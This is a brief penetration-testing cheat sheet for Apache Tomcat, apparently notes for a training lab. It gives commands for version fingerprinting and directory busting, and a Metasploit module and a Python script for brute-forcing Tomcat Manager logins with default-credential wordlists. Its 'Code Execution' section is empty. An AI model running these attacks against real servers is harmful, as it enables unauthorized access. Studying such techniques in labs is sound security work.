Tomcat
Footprinting & Enumeration
# Finding Version
curl -s <http://site.local:8080/docs/> | grep Tomcat
# Important files adn folders to look for information
tomcat-users.xml
web.xml
/manager
/host-managerGobuster
# Directory Busting
gobuster dir -u http:/site.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txtAttacking
Brute Forcing
# Tomcat Manager - Login Brute Force
# Metasploit
use auxiliary/scanner/http/tomcat_mgr_login
set VHOST web01.inlanefreight.local
set RPORT 8180
set stop_on_success true
set rhosts ip
# Python Script
# LINK : <https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce>
python3 mgr_brute.py -U <http://site.local:8180/> -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txtCode Execution
Last updated